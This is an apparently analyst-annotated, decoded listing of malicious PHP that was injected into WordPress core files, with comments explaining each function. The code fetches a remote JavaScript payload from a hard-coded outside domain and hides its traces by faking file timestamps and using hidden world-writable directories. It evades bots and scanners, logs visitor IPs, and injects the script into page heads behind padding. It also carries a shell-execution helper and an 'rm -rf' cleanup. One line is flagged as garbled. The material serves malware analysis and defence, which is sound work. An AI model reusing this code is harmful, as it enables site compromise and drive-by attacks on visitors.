- //======================================================================================
- // Decoded version of the malicious PHP code injected into random WordPress files in the
- // wp-includes directory.
- //
- // Detailed description of the attack can be found here:
- // http://blog.UnmaskParasites.com/2012/07/11/whats-in-your-wp-head/
- //======================================================================================
- if (!function_exists('check_wp_head_load')){
- // Callback registered on WordPress's wp_head action (see the add_action call at the bottom
- // of the file). All helpers below are defined lazily inside it, so they only come into
- // existence once the hook fires. Behaviour summary, as far as this listing shows:
- //  - works out a writable scratch directory: "<system temp>/.tmp", falling back to
- //    "<script dir>/.tmp" or "<script dir>/.cache" (all chmod 0777), and writes a probe
- //    file named "r" into it;
- //  - keeps two per-day files there: "<yymmdd>" (one visitor IP per line) and
- //    "tmp_<yymmdd>" (the base64-encoded remote payload);
- //  - restores the mtime/atime of every directory and file it touches, so the activity
- //    is hard to spot by timestamp;
- //  - for first-time, non-bot visitors without a cookie named "lonly", echoes the decoded
- //    payload inside a <script> tag padded by a few hundred spaces.
- // Returns null on the early-exit paths; otherwise returns nothing.
- function check_wp_head_load(){
- if (!function_exists('downloadURL')){
- // Fetches $url over HTTP and returns the response body as a string.
- // Prefers cURL; if cURL is unavailable, builds a raw HTTP/1.0 request over fsockopen.
- // When neither extension exists it prints "ERROR" and terminates the request (exit).
- // Note: the caller compares the return value against the string "ERROR", but this
- // function never returns that string - it prints it and exits instead.
- function downloadURL($url){
- $user_agent1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)";
- if (function_exists('curl_init')){
- $curlHandler = curl_init();
- curl_setopt($curlHandler, CURLOPT_URL, $url);
- curl_setopt($curlHandler, CURLOPT_HEADER, 0);
- curl_setopt($curlHandler, CURLOPT_TIMEOUT, 30);
- curl_setopt($curlHandler, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curlHandler, CURLOPT_USERAGENT, $user_agent1);
- // Older PHP refuses CURLOPT_FOLLOWLOCATION while safe_mode or open_basedir is active,
- // hence the guard (and the @ on the call).
- if (!(@ini_get("safe_mode") || @ini_get("open_basedir"))){
- @curl_setopt($curlHandler, CURLOPT_FOLLOWLOCATION, 1);
- }
- @curl_setopt($curlHandler, CURLOPT_MAXREDIRS, 2);
- $curlResult = curl_exec($curlHandler);
- curl_close($curlHandler);
- // On a failed transfer this branch falls off the end (return value null);
- // the fsockopen branch is NOT tried as a fallback.
- if ($curlResult !== false){
- return $curlResult;
- }
- }
- else if(function_exists('fsockopen')){
- // $yO_4 is a global that accumulates the headers of previous responses across the
- // recursive redirect-following calls below.
- global $yO_4;
- $url = str_replace("http://", "", $url);
- // Split "host/path" into $url (host) and $yO_5 (path); no path means "/".
- if (preg_match("#/#", "$url")){
- $yO_5 = $url;
- $url = @explode("/", $url);
- $url = $url[0];
- $yO_5 = str_replace($url, "", $yO_5);
- if (!$yO_5 || $yO_5 == ""){
- $yO_5 = "/";
- }
- $yO_6 = gethostbyname($url);
- }
- else {
- $yO_6 = gethostbyname($url);
- $yO_5 = "/";
- }
- // Plain TCP to port 80 with a 10 s connect timeout; $yO_8/$yO_9 receive errno/errstr.
- // stream_set_timeout is called before $yO_7 is checked, so a failed connect raises a
- // warning here and the function then returns null.
- $yO_7 = fsockopen($yO_6, 80, $yO_8, $yO_9, 10);
- stream_set_timeout($yO_7, 10);
- if ($yO_7){
- $yO_10 = "GET $yO_5 HTTP/1.0\r\n";
- $yO_10 .= "Host: $url\r\n";
- $yO_10 .= "Referer: http://$url$yO_5\r\n";
- $yO_10 .= "Accept-Language: en-us, en;q=0.50\r\n";
- // $UA is not declared in this function (only $yO_4 is imported via global), so this
- // header is sent with an empty value.
- $yO_10 .= "User-Agent: $UA\r\n";
- $yO_10 .= "Connection: Close\r\n\r\n";
- fputs($yO_7, $yO_10);
- while (!feof($yO_7)){
- $yO_11 .= fgets($yO_7, 4096);
- }
- fclose($yO_7);
- // Split the raw response into headers ($yO_12) and body ($yO_13) at the first blank line.
- $yO_11 = @explode("\r\n\r\n", $yO_11, 2);
- $yO_12 = $yO_11[0];
- if ($yO_4){
- $yO_12 = "$yO_4<br /><br />\n$yO_12";
- }
- $yO_12 = str_replace("\n", "<br />", $yO_12);
- if ($yO_11[1]){
- $yO_13=$yO_11[1];
- }
- else{
- $yO_13 = "";
- }
- // Result is the body when there is one, otherwise the (HTML-ised) headers.
- if ($yO_13){
- $yO_11 = $yO_13;
- }
- else {
- $yO_11 = $yO_12;
- }
- // Follow a Location header by recursing; unlike the cURL branch there is no
- // redirect limit here.
- if (preg_match("/Location\:/", "$yO_12")){
- $url = @explode("Location: ", $yO_12);
- $url = $url[1];
- $url = @explode("\r", $url);
- $url = $url[0];
- $yO_4 = str_replace("\r\n\r\n", "",$yO_12);
- $yO_14 = "Location:";//location:
- $yO_4 = str_replace("Location:",$yO_14,$yO_4);
- return downloadURL($url);
- }
- else{
- return $yO_11;
- }
- }
- }
- else {
- // Neither cURL nor fsockopen available: aborts the whole page render.
- echo "ERROR";
- exit;
- }
- }
- }
- if (!function_exists('detectBots')){
- // Returns true when the visitor looks like a real browser, false when it matches a
- // known crawler/scanner IP range or User-Agent, or when the UA looks synthetic.
- // $ua: raw User-Agent header; $remoteIP: client IP as a string.
- // The y0(n) calls are string-table lookups that were intentionally left undecoded
- // (see the author's note); only a few entries are shown in clear.
- function detectBots($ua, $remoteIP){ // I deliberately left the arrays of IP ranges and UAs incompletely decoded
- $bot_IPs = array("66\.249\.[6-9][0-9]\.[0-9]+",y0(26),y0(27),y0(28),y0(29),y0(30),y0(31),y0(32),
- y0(33),y0(34),y0(35),y0(36),y0(37),y0(38),y0(39),y0(40),
- y0(41),y0(42),y0(43),y0(44),y0(45),y0(46),y0(47),y0(48),
- y0(49),y0(50),y0(51),y0(52),y0(53),y0(54),y0(55),y0(56),
- y0(57),y0(58),y0(59),y0(60),y0(61),y0(62),y0(63),y0(64),
- y0(65),y0(66),y0(67),y0(68),y0(69),y0(70),y0(71),y0(72),
- y0(73),y0(74),y0(75),y0(76),y0(77),y0(78),y0(79),y0(80),
- y0(81),y0(82),y0(83),y0(84),y0(85),y0(86),y0(87),y0(88),
- y0(89),y0(90),y0(91),y0(92),y0(93),y0(94),y0(95),y0(96),
- y0(97),y0(98),y0(99),y0(100),y0(101),y0(102),y0(103),y0(104),
- y0(105),"118\.169\.40\.20");
- $bot_UAs = array("http", "google",y0(109),y0(110),
- y0(111),y0(112),y0(113),y0(114),y0(115),y0(116),y0(117),y0(118),
- y0(119),y0(120),y0(121),y0(122),y0(123),y0(124),y0(125),y0(126),
- y0(127),y0(128), "yandex", "trend", "virus", "malware", "wget");
- // Strip a leading "User-Agent:" label if the caller passed the whole header line.
- $ua = preg_replace("|User\.Agent\:[\s ]?|i", "", $ua);
- $notBot = true;
- // eregi() is the case-insensitive POSIX regex API, removed in PHP 7 - on current PHP
- // these calls are fatal errors rather than matches.
- // Step 1: client IP against the IP-range patterns.
- foreach ($bot_IPs as $yO_20)
- if (eregi("$yO_20", $remoteIP)){
- $notBot = false;
- break;
- }
- // Step 2: User-Agent against the substring patterns.
- if ($notBot)
- foreach ($bot_UAs as $yO_21)
- if (eregi($yO_21, $ua)!== false){
- $notBot = false;
- break;
- }
- // Step 3: a UA must start with at least five letters and be longer than 11 bytes.
- if ($notBot and !eregi("^[a-zA-Z]{5,}", $ua)){
- $notBot = false;
- }
- if ($notBot and strlen($ua) <= 11){
- $notBot = false;
- }
- return $notBot;
- }
- }
- if (!function_exists('rm_rf_file')){ // clear directory
- // Deletes regular files listed in $dirname, then restores the directory's original
- // mtime/atime so the cleanup leaves no timestamp trace.
- // Note: is_file/chmod/unlink receive the bare entry name, not "$dirname/$afile", so
- // they resolve against the process's current working directory rather than $dirname.
- function rm_rf_file($dirname){
- $modTime = filemtime($dirname);
- if ($yO_24 = opendir($dirname)){
- while (false !==($afile = readdir($yO_24))){
- if ($afile != "." && $afile != ".." && is_file($afile)){
- chmod($afile, 438); //0666
- unlink($afile);
- }
- }
- closedir($yO_24);
- }
- touch($dirname, $modTime, $modTime);
- }
- }
- if (!function_exists('tier')){ //"http://net33net.net/net/?u=" . base64_encode("http://" .$host .$request_uri);
- // Builds the URL the payload is fetched from: the hard-coded net33net.net endpoint with
- // the current page's own URL (HTTP_HOST + REQUEST_URI) base64-encoded in the "u" query
- // parameter. The three parameters are the obfuscation string table and two function
- // names (see the author's notes below); $yO_29/$yO_30/$yO_31/$yO_33 are computed but
- // unused - presumably leftovers of the decoding. The unused mt_rand(0, 4) together
- // with the five net??net.net domains listed below suggests the original picked one of
- // them at random; this decoded version always returns net33net.net.
- function tier($yO_26, $yO_27, $yO_28){
- //$yO_26 = array("ZW5k", "edo", "ced", "/", "_", "esab", "strr", "ten", "ev", "dGVu", "ptth", ":", ".");
- //$yO_27 = "base64_decode"
- //$yO_28 = "strrev"
- $yO_29 = mt_rand(0, 4);
- $yO_30 = $yO_28( $yO_26[7] );//net
- $yO_31 = "end";
- $request_uri = @$_SERVER["REQUEST_URI"];
- $yO_33 = "base64_encode";
- $host = @$_SERVER["HTTP_HOST"];
- return "http://net33net.net/net/?u=" . base64_encode("http://" .$host .$request_uri);
- //net00net.net, net11net.net, net22net.net, net33net.net, net44net.net //178.162.129.170 Hessen - Frankfurt - Leaseweb Germany Gmbh Creation Date: 20-May-2012 Expiration Date: 20-May-2013
- }
- }
- if (!function_exists('sys_get_temp_dir')){
- // Polyfill for the builtin (present since PHP 5.2.1), so this body only runs on very
- // old installs. Tries TMP, TEMP and TMPDIR, then derives the directory from a
- // tempnam() probe file that is immediately deleted. Returns false if nothing works.
- function sys_get_temp_dir(){
- if ($yO_35 = getenv( "TMP" ) )
- return $yO_35;
- if ( $yO_35 = getenv("TEMP") )
- return $yO_35;
- if ($yO_35 = getenv("TMPDIR"))
- return $yO_35;
- // __FILE__ is not a directory; tempnam() is expected to fall back to the system temp
- // directory in that case - TODO confirm for the PHP version in question.
- $yO_35 = tempnam(__FILE__, "");
- if (file_exists($yO_35)){
- unlink($yO_35);
- return dirname($yO_35);
- }
- return false;
- }
- }
- if (!function_exists('execCommand')){
- // Runs $command through the first available of exec / shell_exec / system / passthru /
- // popen / proc_open, with every call error-suppressed so disabled functions fail
- // quietly, and returns the captured output HTML-escaped. Empty $command returns "".
- // Only caller in this listing: the "rm -rf <scratch dir>/*" cleanup in the main body.
- function execCommand($command){
- $execResult = "";
- if (!empty($command)){
- if (function_exists('exec')){
- @exec($command, $execResult);
- $execResult = join("\n", $execResult);
- }
- elseif (function_exists('shell_exec')){
- $execResult=@shell_exec($command);
- }
- elseif (function_exists('system')) {
- // system()/passthru() write straight to output, so capture via output buffering.
- @ob_start();
- @system($command);
- $execResult = @ob_get_contents();
- @ob_end_clean();
- }
- elseif (function_exists('passthru')){
- @ob_start();
- @passthru($command);
- $execResult = @ob_get_contents();
- @ob_end_clean();
- }
- elseif ( @is_resource($yO_38=@popen($command, "r")) ){
- $execResult = "";
- while(!@feof($yO_38)){
- $execResult .=@fread($yO_38, 1024);
- }
- @pclose($yO_38);
- }
- // As printed, the descriptor-spec argument on the next line is not valid PHP
- // (the parentheses around "array(1) => ..." look like a transcription artifact of
- // array(1 => array("pipe", "w"))); treat this branch as approximate.
- elseif (@function_exists('proc_open') && @is_resource($yO_38=@proc_open($command,array(1) => array("pipe", "w")),$yO_39))){
- $execResult = "";
- if (@function_exists('fread') && @function_exists('feof')){
- while (!@feof($yO_39[1])){
- $execResult .= @fread($yO_39[1], 1024);
- }
- }
- else if (@function_exists('fgets') && @function_exists('feof')){
- while (!@feof($yO_39[1])){
- $execResult .=@fgets($yO_39[1], 1024);
- }
- }
- @proc_close($yO_38);
- }
- }
- return htmlspecialchars($execResult);
- }
- }
- // ---- main body of check_wp_head_load ----
- // Name of the opt-out cookie: any request carrying a cookie called "lonly" is left alone.
- $lonly = "lonly";
- $remoteAddress = $_SERVER["REMOTE_ADDR"];
- $UA = $_SERVER["HTTP_USER_AGENT"];
- $scriptFile = $_SERVER["SCRIPT_FILENAME"];
- $yO_43 = strtolower($UA); // computed but never read
- if ($remoteAddress == "" || $UA == "" || $scriptFile == "") // unnatural requests
- return null;
- // Obfuscation string table handed to tier(); only index 7 ("ten") is read there.
- $yO_26 = array("ZW5k", "edo", "ced", "/", "_", "esab", "strr", "ten", "ev", "dGVu", "ptth", ":", ".");
- if (!isset($_COOKIE[$lonly])){
- // Choose the scratch directory. Preferred: "<system temp>/.tmp"; if that cannot be
- // created and written, "<script dir>/.cache"; if no temp dir is known, "<script dir>/.tmp".
- $tmpDir = @sys_get_temp_dir();
- if (!$tmpDir){
- $tmpDir = dirname($scriptFile);
- $newTmpDir = $tmpDir ."/.tmp";
- }
- else {
- $newTmpDir=$tmpDir ."/.tmp";
- if (!@file_exists($newTmpDir)){
- // Parent mtime is captured first and re-applied after mkdir so the parent
- // directory does not look recently modified.
- $modTime = @filemtime($tmpDir);
- @mkdir($newTmpDir);
- $yO_46 = @fopen("$newTmpDir/r", "w"); //test creating a file
- @fwrite($yO_46, "");
- @fclose($yO_46);
- @chmod($newTmpDir, 511); //0777
- @touch("$newTmpDir/r", $modTime, $modTime);
- @touch($tmpDir, $modTime, $modTime);
- @touch($newTmpDir, $modTime, $modTime);
- if (!@file_exists("$newTmpDir/r")){
- $tmpDir = dirname($scriptFile);
- $newTmpDir = $tmpDir ."/.cache";
- }
- }
- }
- $yO_28 = "strrev";
- if (!@file_exists($newTmpDir)) { //create $newTmpDir if it doesn't exist
- $modTime = @filemtime($tmpDir);
- @mkdir($newTmpDir);
- @chmod($newTmpDir, 511); //0777
- @touch($tmpDir, $modTime, $modTime);
- @touch($newTmpDir, $modTime, $modTime);
- }
- $timeStr = @date("Hi"); // hours minutes
- $yO_48 = @date("ymd"); // yymmdd
- // Per-day state files: "<yymmdd>" holds served visitor IPs, "tmp_<yymmdd>" the payload.
- $dateTmpFile = "$newTmpDir/$yO_48";
- $date_Tmp_File = "$newTmpDir/tmp_$yO_48";
- // Plain integer subtraction on the yymmdd number, so it does not roll over month/year
- // boundaries (e.g. the "day before" the 1st is computed as day 0).
- $dayAgo = $yO_48-1;
- $yO_27 = "base64_decode";
- // remove yesterday's files in $newTmpDir every day and all files 3 times a day
- // Cleanup fires when yesterday's payload file still exists, or during the first minute
- // after 00:00, 12:00 and 18:00 (server local time).
- if (@file_exists("$newTmpDir/tmp_$dayAgo") || ($timeStr >= "0000" && $timeStr <= "0001") || ($timeStr >= "1200" && $timeStr <= "1201") || ($timeStr >= "1800" && $timeStr <= "1801")){
- @rm_rf_file($newTmpDir);
- @execCommand("rm -rf $newTmpDir/*");
- }
- if (!@file_exists($dateTmpFile)) { //create $dateTmpFile if it doesn't exist
- $modTime = @filemtime($newTmpDir);
- $yO_46 = @fopen($dateTmpFile, "w");
- @fclose($yO_46);
- @chmod($dateTmpFile, 511); //777
- @touch($newTmpDir, $modTime, $modTime);
- }
- // (Re)fetch the payload when today's cache is missing or shorter than 5 bytes.
- if (@is_writable($newTmpDir) && (!@file_exists($date_Tmp_File) || @filesize($date_Tmp_File) < 5)){
- $payload = @downloadURL( tier($yO_26, $yO_27, $yO_28) ); //"http://net33net.net/net/?u=" . base64_encode("http://" .$host .$request_uri);
- // base64_decode() is called in non-strict mode here, which rarely returns false, so
- // this check accepts almost any response; the "ERROR" comparison never matches
- // because downloadURL() exits instead of returning that string.
- if ($payload != "ERROR" && base64_decode($payload)!== false){ // write downloaded payload to tmp_yymmdd
- $modTime = @filemtime($newTmpDir);
- $yO_46 = @fopen($date_Tmp_File, "w");
- @fwrite($yO_46, "$payload");
- @fclose($yO_46);
- @chmod($date_Tmp_File, 511); //777
- @touch($newTmpDir, $modTime, $modTime);
- @touch($date_Tmp_File, $modTime, $modTime);
- }
- else return null;
- }
- $decodedPayload = @base64_decode( @file_get_contents($date_Tmp_File) );
- // If the IP list cannot be read, @file() yields false and the foreach below warns.
- $yO_54 = @file($dateTmpFile);
- $returningVisitor = false;
- foreach ($yO_54 as $yO_56){ //detect returning visitors
- if (@trim($yO_56) == $remoteAddress){
- $returningVisitor = true;
- break;
- }
- }
- $notBot = @detectBots($UA, $remoteAddress);
- // Serve each IP once per day, and never to anything classified as a bot - the IP list
- // in "<yymmdd>" is therefore also a record of which visitors received the payload.
- if ($returningVisitor == false && $notBot == true){
- $yO_46 = @fopen($dateTmpFile, "a");
- @fwrite($yO_46, "$remoteAddress\n"); // record visitor's IP
- @fclose($yO_46);
- //inject a malicious script after a few hundred whitespaces.
- // The padding pushes the tag out of view in a casual "view source"; the payload is
- // written into the page's <head> unmodified.
- echo "\n" .str_repeat(" ", mt_rand(300,1000)) ."<script type='text/javascript'>$decodedPayload</script>\n";
- }
- }
- }
- }
- // Installer: hooks check_wp_head_load onto WordPress's wp_head action. The third
- // argument is the hook priority, randomised between 1 and 6 so the callback's position
- // among the other wp_head handlers varies from request to request. Requests carrying a
- // cookie named "lonly" are skipped (the callback repeats the same check internally).
- $lonly = "lonly";
- if (!isset($_COOKIE[$lonly]))
- @add_action("wp_head", "check_wp_head_load", mt_rand(1, 6));